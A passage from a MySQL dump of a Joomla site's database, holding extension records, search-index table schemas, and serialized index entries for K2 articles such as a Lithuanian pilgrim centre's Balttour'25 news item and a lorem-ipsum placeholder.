AMDD\",\"type\":\"plugin\",\"creationDate\":\"March 2022\",\"author\":\"Mobile Joomla!\",\"copyright\":\"(C) 2008-2022 Kuneri Ltd. \\/ Denis Ryabov\",\"authorEmail\":\"hello@mobilejoomla.com\",\"authorUrl\":\"https:\\/\\/www.mobilejoomla.com\",\"version\":\"2.1.51\",\"description\":\"PLG_MOBILE_AMDD__AMDD_CHECKER\",\"group\":\"\"}','{\"cache\":\"1\",\"cachesize\":\"1000\"}','','',0,'0000-00-00 00:00:00',0,0),(10102,'Quickicon - Mobile CPanel Icon','plugin','mjcpanel','quickicon',0,1,1,0,'{\"legacy\":false,\"name\":\"Quickicon - Mobile CPanel Icon\",\"type\":\"plugin\",\"creationDate\":\"March 2022\",\"author\":\"Mobile Joomla!\",\"copyright\":\"(C) 2008-2022 Kuneri Ltd. \\/ Denis Ryabov\",\"authorEmail\":\"hello@mobilejoomla.com\",\"authorUrl\":\"https:\\/\\/www.mobilejoomla.com\",\"version\":\"2.1.51\",\"description\":\"Mobile Control Panel Icon\",\"group\":\"\"}','{}','','',0,'0000-00-00 00:00:00',0,0);
/*!40000 ALTER TABLE `xyhmu_extensions` ENABLE KEYS */;
UNLOCK TABLES;

--
-- Table structure for table `xyhmu_finder_filters`
--

DROP TABLE IF EXISTS `xyhmu_finder_filters`;
/*!40101 SET @saved_cs_client     = @@character_set_client */;
/*!40101 SET character_set_client = utf8 */;
CREATE TABLE `xyhmu_finder_filters` (
  `filter_id` int(10) unsigned NOT NULL AUTO_INCREMENT,
  `title` varchar(255) NOT NULL,
  `alias` varchar(255) NOT NULL,
  `state` tinyint(1) NOT NULL DEFAULT '1',
  `created` datetime NOT NULL DEFAULT '0000-00-00 00:00:00',
  `created_by` int(10) unsigned NOT NULL,
  `created_by_alias` varchar(255) NOT NULL,
  `modified` datetime NOT NULL DEFAULT '0000-00-00 00:00:00',
  `modified_by` int(10) unsigned NOT NULL DEFAULT '0',
  `checked_out` int(10) unsigned NOT NULL DEFAULT '0',
  `checked_out_time` datetime NOT NULL DEFAULT '0000-00-00 00:00:00',
  `map_count` int(10) unsigned NOT NULL DEFAULT '0',
  `data` text NOT NULL,
  `params` mediumtext,
  PRIMARY KEY (`filter_id`)
) ENGINE=InnoDB DEFAULT CHARSET=utf8;
/*!40101 SET character_set_client = @saved_cs_client */;

--
-- Dumping data for table `xyhmu_finder_filters`
--

LOCK TABLES `xyhmu_finder_filters` WRITE;
/*!40000 ALTER TABLE `xyhmu_finder_filters` DISABLE KEYS */;
/*!40000 ALTER TABLE `xyhmu_finder_filters` ENABLE KEYS */;
UNLOCK TABLES;

--
-- Table structure for table `xyhmu_finder_links`
--

DROP TABLE IF EXISTS `xyhmu_finder_links`;
/*!40101 SET @saved_cs_client     = @@character_set_client */;
/*!40101 SET character_set_client = utf8 */;
CREATE TABLE `xyhmu_finder_links` (
  `link_id` int(10) unsigned NOT NULL AUTO_INCREMENT,
  `url` varchar(255) NOT NULL,
  `route` varchar(255) NOT NULL,
  `title` varchar(255) DEFAULT NULL,
  `description` varchar(255) DEFAULT NULL,
  `indexdate` datetime NOT NULL DEFAULT '0000-00-00 00:00:00',
  `md5sum` varchar(32) DEFAULT NULL,
  `published` tinyint(1) NOT NULL DEFAULT '1',
  `state` int(5) DEFAULT '1',
  `access` int(5) DEFAULT '0',
  `language` varchar(8) NOT NULL,
  `publish_start_date` datetime NOT NULL DEFAULT '0000-00-00 00:00:00',
  `publish_end_date` datetime NOT NULL DEFAULT '0000-00-00 00:00:00',
  `start_date` datetime NOT NULL DEFAULT '0000-00-00 00:00:00',
  `end_date` datetime NOT NULL DEFAULT '0000-00-00 00:00:00',
  `list_price` double unsigned NOT NULL DEFAULT '0',
  `sale_price` double unsigned NOT NULL DEFAULT '0',
  `type_id` int(11) NOT NULL,
  `object` mediumblob NOT NULL,
  PRIMARY KEY (`link_id`),
  KEY `idx_type` (`type_id`),
  KEY `idx_title` (`title`),
  KEY `idx_md5` (`md5sum`),
  KEY `idx_url` (`url`(75)),
  KEY `idx_published_list` (`published`,`state`,`access`,`publish_start_date`,`publish_end_date`,`list_price`),
  KEY `idx_published_sale` (`published`,`state`,`access`,`publish_start_date`,`publish_end_date`,`sale_price`)
) ENGINE=InnoDB AUTO_INCREMENT=7 DEFAULT CHARSET=utf8;
/*!40101 SET character_set_client = @saved_cs_client */;

--
-- Dumping data for table `xyhmu_finder_links`
--

LOCK TABLES `xyhmu_finder_links` WRITE;
/*!40000 ALTER TABLE `xyhmu_finder_links` DISABLE KEYS */;
INSERT INTO `xyhmu_finder_links` VALUES (1,'index.php?option=com_k2&view=item&id=25','index.php?option=com_k2&view=item&id=25:tytuvenu-piligrimu-centras-dalyvavo-parodoje-balttour-25&Itemid=290','Tytuvėnų piligrimų centras dalyvavo parodoje Balttour\'25','VšĮ ,,Tytuvėnų piligrimų centras\'\' vasario 7-9 d. pristatatė Kelmės kraštą, pagrindinius lankytinus objektus, turistinius ir piligriminius maršrutus Rygoje vykusioje tarptautinėje turizmo parodoje Balttour\'25. Stendo lankytojai domėjosi lankytinais objekt','2025-02-12 13:19:41','fcb2dc762b4f2de5f7c95ca033dd8174',1,0,1,'*','2025-02-12 10:51:42','0000-00-00 00:00:00','2025-02-12 10:51:42','0000-00-00 00:00:00',0,0,1,_binary 'O:19:\"FinderIndexerResult\":18:{s:11:\"\0*\0elements\";a:25:{s:2:\"id\";s:2:\"25\";s:5:\"alias\";s:56:\"tytuvenu-piligrimu-centras-dalyvavo-parodoje-balttour-25\";s:7:\"summary\";s:299:\"<p>VšĮ ,,Tytuvėnų piligrimų centras\'\' vasario 7-9 d. pristatatė Kelmės kraštą, pagrindinius lankytinus objektus, turistinius ir piligriminius maršrutus Rygoje vykusioje tarptautinėje turizmo parodoje Balttour\'25. Stendo lankytojai domėjosi lankytinais objektais, dalyvavo loterijoje.</p>\";s:4:\"body\";s:0:\"\";s:5:\"catid\";s:1:\"1\";s:10:\"created_by\";s:3:\"135\";s:16:\"created_by_alias\";s:0:\"\";s:8:\"modified\";s:19:\"2025-02-12 11:15:39\";s:11:\"modified_by\";s:3:\"135\";s:6:\"params\";O:9:\"JRegistry\":1:{s:7:\"\0*\0data\";O:8:\"stdClass\":155:{s:10:\"enable_css\";s:1:\"1\";s:14:\"jQueryHandling\";s:5:\"1.8.3\";s:21:\"backendJQueryHandling\";s:6:\"remote\";s:8:\"userName\";s:1:\"1\";s:9:\"userImage\";s:1:\"1\";s:15:\"userDescription\";s:1:\"1\";s:7:\"userURL\";s:1:\"1\";s:9:\"userEmail\";s:1:\"0\";s:12:\"userFeedLink\";s:1:\"1\";s:12:\"userFeedIcon\";s:1:\"1\";s:13:\"userItemCount\";s:2:\"10\";s:13:\"userItemTitle\";s:1:\"1\";s:19:\"userItemTitleLinked\";s:1:\"1\";s:19:\"userItemDateCreated\";s:1:\"1\";s:13:\"userItemImage\";s:1:\"1\";s:17:\"userItemIntroText\";s:1:\"1\";s:16:\"userItemCategory\";s:1:\"1\";s:12:\"userItemTags\";s:1:\"1\";s:22:\"userItemCommentsAnchor\";s:1:\"1\";s:16:\"userItemReadMore\";s:1:\"1\";s:17:\"userItemK2Plugins\";s:1:\"1\";s:12:\"tagItemCount\";s:2:\"10\";s:12:\"tagItemTitle\";s:1:\"1\";s:18:\"tagItemTitleLinked\";s:1:\"1\";s:18:\"tagItemDateCreated\";s:1:\"1\";s:12:\"tagItemImage\";s:1:\"1\";s:16:\"tagItemIntroText\";s:1:\"1\";s:15:\"tagItemCategory\";s:1:\"1\";s:15:\"tagItemReadMore\";s:1:\"1\";s:18:\"tagItemExtraFields\";s:1:\"0\";s:11:\"tagOrdering\";s:0:\"\";s:11:\"tagFeedLink\";s:1:\"1\";s:11:\"tagFeedIcon\";s:1:\"1\";s:16:\"genericItemCount\";s:2:\"10\";s:16:\"genericItemTitle\";s:1:\"1\";s:22:\"genericItemTitleLinked\";s:1:\"1\";s:22:\"genericItemDateCreated\";s:1:\"1\";s:16:\"genericItemImage\";s:1:\"1\";s:20:\"genericItemIntroText\";s:1:\"1\";s:19:\"genericItemCategory\";s:1:\"1\";s:19:\"genericItemReadMore\";s:1:\"1\";s:22:\"genericItemExtraFields\";s:1:\"0\";s:15:\"genericFeedLink\";s:1:\"1\";s:15:\"genericFeedIcon\";s:1:\"1\";s:9:\"feedLimit\";s:2:\"10\";s:13:\"feedItemImage\";s:1:\"1\";s:11:\"feedImgSize\";s:1:\"S\";s:17:\"feedItemIntroText\";s:1:\"1\";s:17:\"feedTextWordLimit\";s:0:\"\";s:16:\"feedItemFullText\";s:1:\"1\";s:12:\"feedItemTags\";s:1:\"0\";s:13:\"feedItemVideo\";s:1:\"0\";s:15:\"feedItemGallery\";s:1:\"0\";s:19:\"feedItemAttachments\";s:1:\"0\";s:14:\"feedBogusEmail\";s:0:\"\";s:16:\"introTextCleanup\";s:1:\"0\";s:27:\"introTextCleanupExcludeTags\";s:0:\"\";s:23:\"introTextCleanupTagAttr\";s:0:\"\";s:15:\"fullTextCleanup\";s:1:\"0\";s:26:\"fullTextCleanupExcludeTags\";s:0:\"\";s:22:\"fullTextCleanupTagAttr\";s:0:\"\";s:12:\"xssFiltering\";s:1:\"0\";s:14:\"linkPopupWidth\";s:3:\"900\";s:15:\"linkPopupHeight\";s:3:\"600\";s:13:\"imagesQuality\";s:3:\"100\";s:11:\"itemImageXS\";s:3:\"100\";s:10:\"itemImageS\";s:3:\"200\";s:10:\"itemImageM\";s:3:\"400\";s:10:\"itemImageL\";s:3:\"870\";s:11:\"itemImageXL\";s:3:\"900\";s:16:\"itemImageGeneric\";s:3:\"350\";s:13:\"catImageWidth\";s:3:\"100\";s:15:\"catImageDefault\";s:1:\"1\";s:14:\"userImageWidth\";s:3:\"100\";s:16:\"userImageDefault\";s:1:\"1\";s:17:\"commenterImgWidth\";s:2:\"48\";s:17:\"onlineImageEditor\";s:8:\"splashup\";s:14:\"imageTimestamp\";s:1:\"0\";s:16:\"imageMemoryLimit\";s:0:\"\";s:16:\"socialButtonCode\";s:708:\"<script type=\"text/javascript\" src=\"http://w.sharethis.com/button/buttons.js\"></script>\r\n<script type=\"text/javascript\">stLight.options({publisher: \"ur-c64aa0b1-b15d-c411-f5fd-ee8e97f0f64d\"}); </script>\r\n\r\n<div style=\"padding:20px 0\" class=\"social-share\">\r\n<span class=\'st_facebook_vcount\' displayText=\'Facebook\'></span>\r\n<span class=\'st_twitter_vcount\' displayText=\'Tweet\'></span>\r\n<span class=\'st_googleplus_vcount\' displayText=\'+1\'></span>\r\n<span class=\'st_linkedin_vcount\' displayText=\'LinkedIn\'></span>\r\n<span class=\'st_pinterest_vcount\' displayText=\'Pinterest\'></span>\r\n<span class=\'st_email_vcount\' displayText=\'Email\'></span>\r\n<span class=\'st_sharethis_vcount\' displayText=\'ShareThis\'></span>\r\n</div>\";s:15:\"twitterUsername\";s:0:\"\";s:13:\"facebookImage\";s:6:\"Medium\";s:8:\"comments\";s:1:\"1\";s:16:\"commentsOrdering\";s:4:\"DESC\";s:13:\"commentsLimit\";s:2:\"10\";s:20:\"commentsFormPosition\";s:5:\"below\";s:18:\"commentsPublishing\";s:1:\"1\";s:17:\"commentsReporting\";s:1:\"2\";s:23:\"commentsReportRecipient\";s:0:\"\";s:24:\"inlineCommentsModeration\";s:1:\"0\";s:8:\"gravatar\";s:1:\"1\";s:8:\"antispam\";s:1:\"0\";s:22:\"recaptchaForRegistered\";s:1:\"1\";s:20:\"akismetForRegistered\";s:1:\"1\";s:17:\"commentsFormNotes\";s:1:\"1\";s:21:\"commentsFormNotesText\";s:0:\"\";s:15:\"frontendEditing\";s:1:\"1\";s:12:\"showImageTab\";s:1:\"1\";s:19:\"showImageGalleryTab\";s:1:\"1\";s:12:\"showVideoTab\";s:1:\"1\";s:18:\"showExtraFieldsTab\";s:1:\"1\";s:18:\"showAttachmentsTab\";s:1:\"1\";s:13:\"showK2Plugins\";s:1:\"1\";s:22:\"sideBarDisplayFrontend\";s:1:\"0\";s:12:\"mergeEditors\";s:1:\"1\";s:14:\"sideBarDisplay\";s:1:\"1\";s:17:\"attachmentsFolder\";s:0:\"\";s:16:\"hideImportButton\";s:1:\"1\";s:12:\"googleSearch\";s:1:\"0\";s:21:\"googleSearchContainer\";s:23:\"k2GoogleSearchContainer\";s:13:\"K2UserProfile\";s:1:\"0\";s:8:\"redirect\";s:0:\"\";s:11:\"adminSearch\";s:6:\"simple\";s:12:\"cookieDomain\";s:0:\"\";s:13:\"taggingSystem\";s:1:\"1\";s:8:\"lockTags\";s:1:\"0\";s:13:\"showTagFilter\";s:1:\"0\";s:9:\"k2TagNorm\";s:1:\"0\";s:13:\"k2TagNormCase\";s:5:\"lower\";s:31:\"k2TagNormAdditionalReplacements\";s:0:\"\";s:20:\"recaptcha_public_key\";s:0:\"\";s:21:\"recaptcha_private_key\";s:0:\"\";s:15:\"recaptcha_theme\";s:5:\"clean\";s:23:\"recaptchaOnRegistration\";s:1:\"0\";s:13:\"akismetApiKey\";s:0:\"\";s:13:\"stopForumSpam\";s:1:\"0\";s:19:\"stopForumSpamApiKey\";s:0:\"\";s:21:\"showItemsCounterAdmin\";s:1:\"1\";s:17:\"showChildCatItems\";s:1:\"1\";s:22:\"disableCompactOrdering\";s:1:\"0\";s:13:\"metaDescLimit\";s:3:\"150\";s:22:\"enforceSEFReplacements\";s:1:\"0\";s:15:\"SEFReplacements\";s:2768:\"À|A, Á|A, Â|A, Ã|A, Ä|A, Å|A, à|a, á|a, â|a, ã|a, ä|a, å|a, Ā|A, ā|a, Ă|A, ă|a, Ą|A, ą|a, Ç|C, ç|c, Ć|C, ć|c, Ĉ|C, ĉ|c, Ċ|C, ċ|c, Č|C, č|c, Ð|D, ð|d, Ď|D, ď|d, Đ|D, đ|d, È|E, É|E, Ê|E, Ë|E, è|e, é|e, ê|e, ë|e, Ē|E, ē|e, Ĕ|E, ĕ|e, Ė|E, ė|e, Ę|E, ę|e, Ě|E, ě|e, Ĝ|G, ĝ|g, Ğ|G, ğ|g, Ġ|G, ġ|g, Ģ|G, ģ|g, Ĥ|H, ĥ|h, Ħ|H, ħ|h, Ì|I, Í|I, Î|I, Ï|I, ì|i, í|i, î|i, ï|i, Ĩ|I, ĩ|i, Ī|I, ī|i, Ĭ|I, ĭ|i, Į|I, į|i, İ|I, ı|i, Ĵ|J, ĵ|j, Ķ|K, ķ|k, ĸ|k, Ĺ|L, ĺ|l, Ļ|L, ļ|l, Ľ|L, ľ|l, Ŀ|L, ŀ|l, Ł|L, ł|l, Ñ|N, ñ|n, Ń|N, ń|n, Ņ|N, ņ|n, Ň|N, ň|n, ŉ|n, Ŋ|N, ŋ|n, Ò|O, Ó|O, Ô|O, Õ|O, Ö|O, Ø|O, ò|o, ó|o, ô|o, õ|o, ö|o, ø|o, Ō|O, ō|o, Ŏ|O, ŏ|o, Ő|O, ő|o, Ŕ|R, ŕ|r, Ŗ|R, ŗ|r, Ř|R, ř|r, Ś|S, ś|s, Ŝ|S, ŝ|s, Ş|S, ş|s, Š|S, š|s, ſ|s, Ţ|T, ţ|t, Ť|T, ť|t, Ŧ|T, ŧ|t, Ù|U, Ú|U, Û|U, Ü|U, ù|u, ú|u, û|u, ü|u, Ũ|U, ũ|u, Ū|U, ū|u, Ŭ|U, ŭ|u, Ů|U, ů|u, Ű|U, ű|u, Ų|U, ų|u, Ŵ|W, ŵ|w, Ý|Y, ý|y, ÿ|y, Ŷ|Y, ŷ|y, Ÿ|Y, Ź|Z, ź|z, Ż|Z, ż|z, Ž|Z, ž|z, α|a, β|b, γ|g, δ|d, ε|e, ζ|z, η|h, θ|th, ι|i, κ|k, λ|l, μ|m, ν|n, ξ|x, ο|o, π|p, ρ|r, σ|s, τ|t, υ|y, φ|f, χ|ch, ψ|ps, ω|w, Α|A, Β|B, Γ|G, Δ|D, Ε|E, Ζ|Z, Η|H, Θ|Th, Ι|I, Κ|K, Λ|L, Μ|M, Ξ|X, Ο|O, Π|P, Ρ|R, Σ|S, Τ|T, Υ|Y, Φ|F, Χ|Ch, Ψ|Ps, Ω|W, ά|a, έ|e, ή|h, ί|i, ό|o, ύ|y, ώ|w, Ά|A, Έ|E, Ή|H, Ί|I, Ό|O, Ύ|Y, Ώ|W, ϊ|i, ΐ|i, ϋ|y, ς|s, А|A, Ӑ|A, Ӓ|A, Ә|E, Ӛ|E, Ӕ|E, Б|B, В|V, Г|G, Ґ|G, Ѓ|G, Ғ|G, Ӷ|G, y|Y, Д|D, Е|E, Ѐ|E, Ё|YO, Ӗ|E, Ҽ|E, Ҿ|E, Є|YE, Ж|ZH, Ӂ|DZH, Җ|ZH, Ӝ|DZH, З|Z, Ҙ|Z, Ӟ|DZ, Ӡ|DZ, Ѕ|DZ, И|I, Ѝ|I, Ӥ|I, Ӣ|I, І|I, Ї|JI, Ӏ|I, Й|Y, Ҋ|Y, Ј|J, К|K, Қ|Q, Ҟ|Q, Ҡ|K, Ӄ|Q, Ҝ|K, Л|L, Ӆ|L, Љ|L, М|M, Ӎ|M, Н|N, Ӊ|N, Ң|N, Ӈ|N, Ҥ|N, Њ|N, О|O, Ӧ|O, Ө|O, Ӫ|O, Ҩ|O, П|P, Ҧ|PF, Р|P, Ҏ|P, С|S, Ҫ|S, Т|T, Ҭ|TH, Ћ|T, Ќ|K, У|U, Ў|U, Ӳ|U, Ӱ|U, Ӯ|U, Ү|U, Ұ|U, Ф|F, Х|H, Ҳ|H, Һ|H, Ц|TS, Ҵ|TS, Ч|CH, Ӵ|CH, Ҷ|CH, Ӌ|CH, Ҹ|CH, Џ|DZ, Ш|SH, Щ|SHT, Ъ|A, Ы|Y, Ӹ|Y, Ь|Y, Ҍ|Y, Э|E, Ӭ|E, Ю|YU, Я|YA, а|a, ӑ|a, ӓ|a, ә|e, ӛ|e, ӕ|e, б|b, в|v, г|g, ґ|g, ѓ|g, ғ|g, ӷ|g, y|y, д|d, е|e, ѐ|e, ё|yo, ӗ|e, ҽ|e, ҿ|e, є|ye, ж|zh, ӂ|dzh, җ|zh, ӝ|dzh, з|z, ҙ|z, ӟ|dz, ӡ|dz, ѕ|dz, и|i, ѝ|i, ӥ|i, ӣ|i, і|i, ї|ji, Ӏ|i, й|y, ҋ|y, ј|j, к|k, қ|q, ҟ|q, ҡ|k, ӄ|q, ҝ|k, л|l, ӆ|l, љ|l, м|m, ӎ|m, н|n, ӊ|n, ң|n, ӈ|n, ҥ|n, њ|n, о|o, ӧ|o, ө|o, ӫ|o, ҩ|o, п|p, ҧ|pf, р|p, ҏ|p, с|s, ҫ|s, т|t, ҭ|th, ћ|t, ќ|k, у|u, ў|u, ӳ|u, ӱ|u, ӯ|u, ү|u, ұ|u, ф|f, х|h, ҳ|h, һ|h, ц|ts, ҵ|ts, ч|ch, ӵ|ch, ҷ|ch, ӌ|ch, ҹ|ch, џ|dz, ш|sh, щ|sht, ъ|a, ы|y, ӹ|y, ь|y, ҍ|y, э|e, ӭ|e, ю|yu, я|ya\";s:5:\"k2Sef\";s:1:\"0\";s:13:\"k2SefLabelCat\";s:7:\"content\";s:13:\"k2SefLabelTag\";s:3:\"tag\";s:14:\"k2SefLabelUser\";s:6:\"author\";s:16:\"k2SefLabelSearch\";s:6:\"search\";s:14:\"k2SefLabelDate\";s:4:\"date\";s:14:\"k2SefLabelItem\";s:1:\"0\";s:26:\"k2SefLabelItemCustomPrefix\";s:0:\"\";s:17:\"k2SefInsertItemId\";s:1:\"1\";s:24:\"k2SefItemIdTitleAliasSep\";s:4:\"dash\";s:22:\"k2SefUseItemTitleAlias\";s:1:\"1\";s:16:\"k2SefInsertCatId\";s:1:\"1\";s:23:\"k2SefCatIdTitleAliasSep\";s:4:\"dash\";s:21:\"k2SefUseCatTitleAlias\";s:1:\"1\";s:16:\"sh404SefLabelCat\";s:0:\"\";s:17:\"sh404SefLabelUser\";s:4:\"blog\";s:17:\"sh404SefLabelItem\";s:1:\"2\";s:18:\"sh404SefTitleAlias\";s:5:\"alias\";s:29:\"sh404SefModK2ContentFeedAlias\";s:4:\"feed\";s:20:\"sh404SefInsertItemId\";s:1:\"0\";s:26:\"sh404SefInsertUniqueItemId\";s:1:\"0\";s:13:\"cbIntegration\";s:1:\"0\";}}s:7:\"metakey\";s:0:\"\";s:8:\"metadesc\";s:0:\"\";s:8:\"metadata\";O:9:\"JRegistry\":1:{s:7:\"\0*\0data\";O:8:\"stdClass\":2:{s:6:\"robots\";s:0:\"\";s:6:\"author\";s:0:\"\";}}s:8:\"ordering\";s:1:\"1\";s:5:\"trash\";s:1:\"1\";s:9:\"cat_trash\";s:1:\"0\";s:8:\"category\";s:11:\"Latest News\";s:9:\"cat_state\";s:1:\"1\";s:10:\"cat_access\";s:1:\"1\";s:4:\"slug\";s:59:\"25:tytuvenu-piligrimu-centras-dalyvavo-parodoje-balttour-25\";s:7:\"catslug\";s:13:\"1:latest-news\";s:6:\"author\";s:10:\"Super User\";s:6:\"layout\";s:4:\"item\";s:4:\"path\";s:93:\"index.php/lankytini-objektai/item/25-tytuvenu-piligrimu-centras-dalyvavo-parodoje-balttour-25\";s:10:\"metaauthor\";N;}s:15:\"\0*\0instructions\";a:5:{i:1;a:3:{i:0;s:5:\"title\";i:1;s:8:\"subtitle\";i:2;s:2:\"id\";}i:2;a:2:{i:0;s:7:\"summary\";i:1;s:4:\"body\";}i:3;a:8:{i:0;s:4:\"meta\";i:1;s:10:\"list_price\";i:2;s:10:\"sale_price\";i:3;s:7:\"metakey\";i:4;s:8:\"metadesc\";i:5;s:10:\"metaauthor\";i:6;s:6:\"author\";i:7;s:16:\"created_by_alias\";}i:4;a:2:{i:0;s:4:\"path\";i:1;s:5:\"alias\";}i:5;a:1:{i:0;s:8:\"comments\";}}s:11:\"\0*\0taxonomy\";a:4:{s:4:\"Type\";a:1:{s:7:\"K2 Item\";O:7:\"JObject\":4:{s:10:\"\0*\0_errors\";a:0:{}s:5:\"title\";s:7:\"K2 Item\";s:5:\"state\";i:1;s:6:\"access\";i:1;}}s:6:\"Author\";a:1:{s:10:\"Super User\";O:7:\"JObject\":4:{s:10:\"\0*\0_errors\";a:0:{}s:5:\"title\";s:10:\"Super User\";s:5:\"state\";i:1;s:6:\"access\";i:1;}}s:11:\"K2 Category\";a:1:{s:11:\"Latest News\";O:7:\"JObject\":4:{s:10:\"\0*\0_errors\";a:0:{}s:5:\"title\";s:11:\"Latest News\";s:5:\"state\";i:1;s:6:\"access\";i:1;}}s:8:\"Language\";a:1:{s:1:\"*\";O:7:\"JObject\":4:{s:10:\"\0*\0_errors\";a:0:{}s:5:\"title\";s:1:\"*\";s:5:\"state\";i:1;s:6:\"access\";i:1;}}}s:3:\"url\";s:39:\"index.php?option=com_k2&view=item&id=25\";s:5:\"route\";s:107:\"index.php?option=com_k2&view=item&id=25:tytuvenu-piligrimu-centras-dalyvavo-parodoje-balttour-25&Itemid=290\";s:5:\"title\";s:59:\"Tytuvėnų piligrimų centras dalyvavo parodoje Balttour\'25\";s:11:\"description\";s:292:\"VšĮ ,,Tytuvėnų piligrimų centras\'\' vasario 7-9 d. pristatatė Kelmės kraštą, pagrindinius lankytinus objektus, turistinius ir piligriminius maršrutus Rygoje vykusioje tarptautinėje turizmo parodoje Balttour\'25. Stendo lankytojai domėjosi lankytinais objektais, dalyvavo loterijoje.\";s:9:\"published\";N;s:5:\"state\";i:0;s:6:\"access\";s:1:\"1\";s:8:\"language\";s:1:\"*\";s:18:\"publish_start_date\";s:19:\"2025-02-12 10:51:42\";s:16:\"publish_end_date\";s:19:\"0000-00-00 00:00:00\";s:10:\"start_date\";s:19:\"2025-02-12 10:51:42\";s:8:\"end_date\";s:19:\"0000-00-00 00:00:00\";s:10:\"list_price\";N;s:10:\"sale_price\";N;s:7:\"type_id\";i:1;}'),(2,'index.php?option=com_k2&view=item&id=1','index.php?option=com_k2&view=item&id=1:latest-news-analysis&Itemid=290','Fall Career Fair set for Sept. 25','Lorem ipsum dolor sit amet, consectetuer adipiscing elit, sed diam nonummy nibh euismod tincidunt ut laoreet dolore magna aliquam erat volutpat. Ut wisi enim ad minim veniam, quis nostrud exerci tation ullamcorper suscipit lobortis nisl ut aliquip ex ea c','2025-02-12 13:16:37','a99acbbb8ecd57dcbe76e8191a8f2c63',1,1,1,'*','2013-09-24 06:16:44','0000-00-00 00:00:00','2013-09-24 06:16:44','0000-00-00 00:00:00',0,0,1,_binary 'O:19:\"FinderIndexerResult\":18:{s:11:\"\0*\0elements\";a:25:{s:2:\"id\";s:1:\"1\";s:5:\"alias\";s:20:\"latest-news-analysis\";s:7:\"summary\";s:550:\"<p>Lorem ipsum dolor sit amet, consectetuer adipiscing elit, sed diam nonummy nibh euismod tincidunt ut laoreet dolore magna aliquam erat volutpat. Ut wisi enim ad minim veniam, quis nostrud exerci tation ullamcorper suscipit lobortis nisl ut aliquip ex ea commodo consequat. Duis autem vel eum iriure dolor in hendrerit in vulputate velit esse molestie consequat, vel illum dolore eu feugiat nulla facilisis at vero eros et accumsan et iusto odio dignissim qui blandit praesent luptatum zzril delenit augue duis dolore te feugait nulla facilisi.</p>\";s:4:\"body\";s:0:\"\";s:5:\"catid\";s:1:\"1\";s:10:\"created_by\";s:3:\"135\";s:16:\"created_by_alias\";s:0:\"\";s:8:\"modified\";s:19:\"2013-10-07 09:13:57\";s:11:\"modified_by\";s:3:\"135\";s:6:\"params\";O:9:\"JRegistry\":1:{s:7:\"\0*\0data\";O:8:\"stdClass\":155:{s:10:\"enable_css\";s:1:\"1\";s:14:\"jQueryHandling\";s:5:\"1.8.3\";s:21:\"backendJQueryHandling\";s:6:\"remote\";s:8:\"userName\";s:1:\"1\";s:9:\"userImage\";s:1:\"1\";s:15:\"userDescription\";s:1:\"1\";s:7:\"userURL\";s:1:\"1\";s:9:\"userEmail\";s:1:\"0\";s:12:\"userFeedLink\";s:1:\"1\";s:12:\"userFeedIcon\";s:1:\"1\";s:13:\"userItemCount\";s:2:\"10\";s:13:\"userItemTitle\";s:1:\"1\";s:19:\"userItemTitleLinked\";s:1:\"1\";s:19:\"userItemDateCreated\";s:1:\"1\";s:13:\"userItemImage\";s:1:\"1\";s:17:\"userItemIntroText\";s:1:\"1\";s:16:\"userItemCategory\";s:1:\"1\";s:12:\"userItemTags\";s:1:\"1\";s:22:\"userItemCommentsAnchor\";s:1:\"1\";s:16:\"userItemReadMore\";s:1:\"1\";s:17:\"userItemK2Plugins\";s:1:\"1\";s:12:\"tagItemCount\";s:2:\"10\";s:12:\"tagItemTitle\";s:1:\"1\";s:18:\"tagItemTitleLinked\";s:1:\"1\";s:18:\"tagItemDateCreated\";s:1:\"1\";s:12:\"tagItemImage\";s:1:\"1\";s:16:\"tagItemIntroText\";s:1:\"1\";s:15:\"tagItemCategory\";s:1:\"1\";s:15:\"tagItemReadMore\";s:1:\"1\";s:18:\"tagItemExtraFields\";s:1:\"0\";s:11:\"tagOrdering\";s:0:\"\";s:11:\"tagFeedLink\";s:1:\"1\";s:11:\"tagFeedIcon\";s:1:\"1\";s:16:\"genericItemCount\";s:2:\"10\";s:16:\"genericItemTitle\";s:1:\"1\";s:22:\"genericItemTitleLinked\";s:1:\"1\";s:22:\"genericItemDateCreated\";s:1:\"1\";s:16:\"genericItemImage\";s:1:\"1\";s:20:\"genericItemIntroText\";s:1:\"1\";s:19:\"genericItemCategory\";s:1:\"1\";s:19:\"genericItemReadMore\";s:1:\"1\";s:22:\"genericItemExtraFields\";s:1:\"0\";s:15:\"genericFeedLink\";s:1:\"1\";s:15:\"genericFeedIcon\";s:1:\"1\";s:9:\"feedLimit\";s:2:\"10\";s:13:\"feedItemImage\";s:1:\"1\";s:11:\"feedImgSize\";s:1:\"S\";s:17:\"feedItemIntroText\";s:1:\"1\";s:17:\"feedTextWordLimit\";s:0:\"\";s:16:\"feedItemFullText\";s:1:\"1\";s:12:\"feedItemTags\";s:1:\"0\";s:13:\"feedItemVideo\";s:1:\"0\";s:15:\"feedItemGallery\";s:1:\"0\";s:19:\"feedItemAttachments\";s:1:\"0\";s:14:\"feedBogusEmail\";s:0:\"\";s:16:\"introTextCleanup\";s:1:\"0\";s:27:\"introTextCleanupExcludeTags\";s:0:\"\";s:23:\"introTextCleanupTagAttr\";s:0:\"\";s:15:\"fullTextCleanup\";s:1:\"0\";s:26:\"fullTextCleanupExcludeTags\";s:0:\"\";s:22:\"fullTextCleanupTagAttr\";s:0:\"\";s:12:\"xssFiltering\";s:1:\"0\";s:14:\"linkPopupWidth\";s:3:\"900\";s:15:\"linkPopupHeight\";s:3:\"600\";s:13:\"imagesQuality\";s:3:\"100\";s:11:\"itemImageXS\";s:3:\"100\";s:10:\"itemImageS\";s:3:\"200\";s:10:\"itemImageM\";s:3:\"400\";s:10:\"itemImageL\";s:3:\"870\";s:11:\"itemImageXL\";s:3:\"900\";s:16:\"itemImageGeneric\";s:3:\"350\";s:13:\"catImageWidth\";s:3:\"100\";s:15:\"catImageDefault\";s:1:\"1\";s:14:\"userImageWidth\";s:3:\"100\";s:16:\"userImageDefault\";s:1:\"1\";s:17:\"commenterImgWidth\";s:2:\"48\";s:17:\"onlineImageEditor\";s:8:\"splashup\";s:14:\"imageTimestamp\";s:1:\"0\";s:16:\"imageMemoryLimit\";s:0:\"\";s:16:\"socialButtonCode\";s:708:\"<script type=\"text/javascript\" src=\"http://w.sharethis.com/button/buttons.js\"></script>\r\n<script type=\"text/javascript\">stLight.options({publisher: \"ur-c64aa0b1-b15d-c411-f5fd-ee8e97f0f64d\"}); </script>\r\n\r\n<div style=\"padding:20px 0\" class=\"social-share\">\r\n<span class=\'st_facebook_vcount\' displayText=\'Facebook\'></span>\r\n<span class=\'st_twitter_vcount\' displayText=\'Tweet\'></span>\r\n<span 